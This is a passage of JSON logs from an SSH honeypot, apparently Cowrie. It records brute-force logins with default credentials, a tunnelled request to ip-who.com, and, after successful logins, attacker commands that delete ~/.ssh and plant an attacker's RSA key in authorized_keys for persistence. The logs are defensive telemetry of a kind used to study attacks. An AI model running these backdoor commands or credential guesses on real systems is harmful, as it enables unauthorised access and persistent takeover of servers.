sh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T08:10:21.537011Z","src_ip":"212.227.125.160","session":"f26ec81a3815"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:10:31.726450Z","src_ip":"212.227.125.160","session":"f26ec81a3815"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-09-09T08:10:32.119818Z","session":"f26ec81a3815"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T08:10:32.437514Z","src_ip":"212.227.125.160","session":"f26ec81a3815"}
{"eventid":"cowrie.session.closed","duration":"22.6","message":"Connection lost after 22.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:10:43.823980Z","src_ip":"212.227.125.160","session":"f26ec81a3815"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57614,"dst_ip":"1.2.3.4","dst_port":22,"session":"11ede2c11ee6","protocol":"ssh","message":"New connection: 212.227.125.160:57614 (1.2.3.4:22) [session: 11ede2c11ee6]","sensor":"my-vps","timestamp":"2025-09-09T08:10:52.933308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T08:10:52.959823Z","src_ip":"212.227.125.160","session":"11ede2c11ee6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40094,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc59cfaa8bb9","protocol":"ssh","message":"New connection: 212.227.235.229:40094 (1.2.3.4:22) [session: bc59cfaa8bb9]","sensor":"my-vps","timestamp":"2025-09-09T08:10:57.503878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:10:57.504988Z","src_ip":"212.227.235.229","session":"bc59cfaa8bb9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:10:57.590053Z","src_ip":"212.227.235.229","session":"bc59cfaa8bb9"}
{"eventid":"cowrie.login.failed","username":"mydb","password":"mydb","message":"login attempt [mydb/mydb] failed","sensor":"my-vps","timestamp":"2025-09-09T08:10:57.969940Z","src_ip":"212.227.235.229","session":"bc59cfaa8bb9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T08:10:58.053992Z","src_ip":"212.227.125.160","session":"11ede2c11ee6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:10:59.057560Z","src_ip":"212.227.235.229","session":"bc59cfaa8bb9"}
{"eventid":"cowrie.login.failed","username":"1234","password":"1234","message":"login attempt [1234/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T08:11:00.038995Z","src_ip":"212.227.125.160","session":"11ede2c11ee6"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:11:01.389705Z","src_ip":"212.227.125.160","session":"11ede2c11ee6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34490,"dst_ip":"1.2.3.4","dst_port":22,"session":"a746c24af009","protocol":"ssh","message":"New connection: 212.227.235.229:34490 (1.2.3.4:22) [session: a746c24af009]","sensor":"my-vps","timestamp":"2025-09-09T08:12:13.626486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:12:13.627797Z","src_ip":"212.227.235.229","session":"a746c24af009"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:12:13.712638Z","src_ip":"212.227.235.229","session":"a746c24af009"}
{"eventid":"cowrie.login.success","username":"root","password":"6.05e+11","message":"login attempt [root/6.05e+11] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:12:14.093389Z","src_ip":"212.227.235.229","session":"a746c24af009"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:12:14.331763Z","src_ip":"212.227.235.229","session":"a746c24af009"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:12:14.332464Z","src_ip":"212.227.235.229","session":"a746c24af009"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:12:14.333632Z","src_ip":"212.227.235.229","session":"a746c24af009"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:12:14.420567Z","src_ip":"212.227.235.229","session":"a746c24af009"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:12:14.607831Z","src_ip":"212.227.235.229","session":"a746c24af009"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:12:14.608644Z","src_ip":"212.227.235.229","session":"a746c24af009"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:12:14.695523Z","src_ip":"212.227.235.229","session":"a746c24af009"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:12:14.696545Z","src_ip":"212.227.235.229","session":"a746c24af009"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34504,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a8aa4f5c8fd","protocol":"ssh","message":"New connection: 212.227.235.229:34504 (1.2.3.4:22) [session: 3a8aa4f5c8fd]","sensor":"my-vps","timestamp":"2025-09-09T08:12:14.784491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:12:14.785490Z","src_ip":"212.227.235.229","session":"3a8aa4f5c8fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:12:14.870193Z","src_ip":"212.227.235.229","session":"3a8aa4f5c8fd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:12:15.254890Z","src_ip":"212.227.235.229","session":"3a8aa4f5c8fd"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:12:16.342299Z","src_ip":"212.227.235.229","session":"3a8aa4f5c8fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34516,"dst_ip":"1.2.3.4","dst_port":22,"session":"43644faf13f6","protocol":"ssh","message":"New connection: 212.227.235.229:34516 (1.2.3.4:22) [session: 43644faf13f6]","sensor":"my-vps","timestamp":"2025-09-09T08:12:16.426415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:12:16.427700Z","src_ip":"212.227.235.229","session":"43644faf13f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:12:16.512700Z","src_ip":"212.227.235.229","session":"43644faf13f6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:12:16.893635Z","src_ip":"212.227.235.229","session":"43644faf13f6"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:12:16.985181Z","src_ip":"212.227.235.229","session":"a746c24af009"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:12:16.985971Z","src_ip":"212.227.235.229","session":"43644faf13f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51600,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ddceeca8a72","protocol":"ssh","message":"New connection: 212.227.235.229:51600 (1.2.3.4:22) [session: 4ddceeca8a72]","sensor":"my-vps","timestamp":"2025-09-09T08:13:26.015273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:13:26.016235Z","src_ip":"212.227.235.229","session":"4ddceeca8a72"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:13:26.099760Z","src_ip":"212.227.235.229","session":"4ddceeca8a72"}
{"eventid":"cowrie.login.success","username":"root","password":"Support!12","message":"login attempt [root/Support!12] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:13:26.484316Z","src_ip":"212.227.235.229","session":"4ddceeca8a72"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:13:26.708200Z","src_ip":"212.227.235.229","session":"4ddceeca8a72"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:13:26.709009Z","src_ip":"212.227.235.229","session":"4ddceeca8a72"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:13:26.709925Z","src_ip":"212.227.235.229","session":"4ddceeca8a72"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:13:26.794906Z","src_ip":"212.227.235.229","session":"4ddceeca8a72"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:13:26.986482Z","src_ip":"212.227.235.229","session":"4ddceeca8a72"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:13:26.987276Z","src_ip":"212.227.235.229","session":"4ddceeca8a72"}
